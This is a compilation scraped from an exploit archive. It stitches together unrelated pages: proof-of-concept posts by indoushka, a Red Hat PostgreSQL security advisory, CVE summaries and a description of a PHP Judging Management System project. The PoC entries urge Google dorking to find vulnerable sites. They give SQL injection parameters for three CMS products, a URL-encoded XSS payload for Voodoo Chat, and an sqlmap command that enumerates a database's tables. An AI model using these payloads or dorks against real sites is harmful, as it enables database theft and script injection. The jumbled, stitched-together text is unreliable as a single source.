    ====================================================================================================================================| # Title     : Virtues cpanelCMS v1.0 sql injection Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.virtues.ag/                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /index/noticia_integra.php?id_clipping=[+] http://wospluralorg/index/noticia_integra.php?id_clipping= inject herGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Virtues cpanelCMS 1.0 SQL Injection

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

**Voodoo Chat 1.3 Cross Site Scripting**

Posted Aug 8, 2023

Authored by indoushka

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 11f7a2efbdf14e9500b0a6e971a896bbac171caeed20cc661f2b4ad1b5c02e2e

Download | Favorite | View

**Voodoo Chat 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Voodoo Chat v1.3 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.swalif.net/softs/swalif30/softs258256/#post1850068                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0[+] http://127.0.0.1/groupsyriacom/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Voodoo Chat 1.3 Cross Site Scripting

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

**eneblur CMS 1.0 SQL Injection**

Posted Aug 8, 2023

Authored by indoushka

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 4d67639c944054e33175ed2e55a36b45439dd449f6e73134fe454cc1d6a7bb71

Download | Favorite | View

**eneblur CMS 1.0 SQL Injection**

    ====================================================================================================================================| # Title     : eneblur CMS 1.0 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://www.eneblur.com/web-application-development.php                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /journal_details.php?jid= <===== inject here [+] D:\sqlmap>sqlmap.py -u http://127.0.0.1/wenvirobiotechjournalscom/journal_details.php?jid=3 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D envirobi_portal_server3Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eneblur CMS 1.0 SQL Injection

Red Hat Security Advisory 2023-4527-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:13 security update  
Advisory ID:       RHSA-2023:4527-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4527  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:13 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.src.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.src.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-13.11-1.module+el8.8.0+19081+0a277c66.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k8pAAoJENzjgjWX9erE+eYQAJRHA0QdZv5xV9TWliWdsitH  
6tP5HpsBibR5c1ZZTYGULESqi1fiiDa2qD9rvT0bY+17LdhfSofd57OqUT+SCI1g  
AQ5umKalGbrpvNQ86FJ90UjTpASSdP3cCrdZ8cvJbyNgvjE+pQmkH4rJUxz1PD1j  
6dI+TLEsRSspOADDeuDESuLEwV6IYezmraPoLFyNr6+fE8Byfldf7tTFqu0PT8pD  
edQiQqRfbRSK2MiVQPWFdBlfHbLLUzzMl+IYIyCWDGdAglsnqOQqQUyGoH1b+gKd  
O/TauZ8kV1t9KlJSdo5GJFWrY6nULBunrB3uRWEi7iV+WtqF1oc/42HhcZ+PDKFd  
H/uDTAek+QiCuKJqpnGnwDf+gTUQupvlSN6+1hHSr/VN0j4IL1s0CJ6n1DIXj4Wv  
ewHllUnsUzstH6fA/tDOx31MBsEUPgb3HNagHjuwNf+kBeGAVDFWTaMlk082NgX5  
5fa2PrgpqQQQ6fvwBypoPhiqlnuevJW+FRSyqPNcSGg0b1o7BGbNqsXQG7mPKikt  
e7HpJ/9IHDMHXJG4jI3Dz4xe17xFSC9P+YWGeRHrVpoEe4ad6N0+uCYFBztaUAuv  
NCKdrDr8pTeZObDQbZ/zozirUQINLOlZW28gfHCVX3B6XD4v/NgD08PPcWziepjZ  
Bb739FMpHL9bwdagWyGU  
=+g0V  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4527-01

CMS BMGI International version 4.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS BMGI International v 4.0 Sql injection Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://batel.net/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] inject here : /_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisv[+] http://127.0.0.1/scimatdz/_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisvGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS BMGI International 4.0 SQL Injection

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Digital Ant E-Commerce Software allows SQL Injection.This issue affects E-Commerce Software: before 11.



CVE-2023-3651

A vulnerability was found in SourceCodester Doctors Appointment System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument useremail leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236365 was assigned to this vulnerability.

CVE-2023-4219

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-jms/deductScores.php.

Submitted by oretnom23 on Friday, December 2, 2022 - 14:30.

This project is entitled **Judging Management System**. It is a web-based application that was developed using **PHP Language** and **MySQL Database**. The application provides an online and automated judging system. I manage certain organizations' event contests. It has a pleasant user interface and consists of user-friendly features and functionalities.

****How does the Judging Management System work?****

**The Judging Management System** is an automated or electronic platform for managing and tallying certain contest scoring. This application allows certain organization management or staff to register on the system for free. **Organizer** or user can simply create their account by filling in all the required fields on the registration form. Registered organizers can create multiple events and sub-events. They can list the event contestants, judges, and criteria if the sub-event is activated. Judges can manage the score of the contestant using the system-generated judge code. The system also contains an Overall tally, tally by judges, contestant ranking, and event placing features.

****Features and Functionalities****

The **Judging Management System** project is consist of the following features and functionalities.

****Organizers****

*   **Manage Event List**
*   **Manage Sub-Event**
*   **Manage Sub-Event Settings**
    *   List of Contestant
    *   List of Judges
    *   Criteria Management
*   **Score Sheets Management**
    *   Live View of Scores
    *   View Contestant Scores per Judges
    *   Deduct Contestant Point(s)
    *   Generate Final Result
    *   Generate Over All Result
*   **Review Data**
*   **Manage Organizer's Basic and Company Information**
*   **Add/Edit Tabulator User**

****Tabulator****

*   **Live View of Scores**
*   **View Contestant Scores per Judges**
*   **Deduct Contestant Point(s)**
*   **Generate Final Result**
*   **Generate Over All Result**

****Judges****

*   **Manage Contestant Score**
*   **Update Contestant Score**
*   **View Tally**

****Snapshots****

Here are some snapshots of some pages of the **Judging Management System**

****Event List****

****Event's List of Judges****

****Judge Panel's Scoring Page****

****Judge Panel's Tally Page****

****Event's Contestant Scores Per Judge****

The **Judging Management System** project source code is available on this website. The source code is a modified copy and not developed from scratch _(unmodified copy was downloaded from http://freeproject24.com/php-judging-system-with-source-code-freeproject24/)_. Feel free to download the modified copy on this site.

****How to Run?****

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** named ****jms\_db****.
6.  **Import** the provided ****SQL**** file. The file is known as ****jms\_db.sql**** located inside the **db** folder.
7.  **Browse** the **Judging Management System** in a **browser**. i.e. ****http://localhost/php-jms/****.

You can simply create your own organizer user by registering on the system.

That's it! I hope this **Judging Management System in PHP and MySQL Database Project** helps you with what you are looking for and that you'll find something useful also from the source code itself for your current and future **PHP Projects**.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy :)****

*   4543 views

Tag

#sql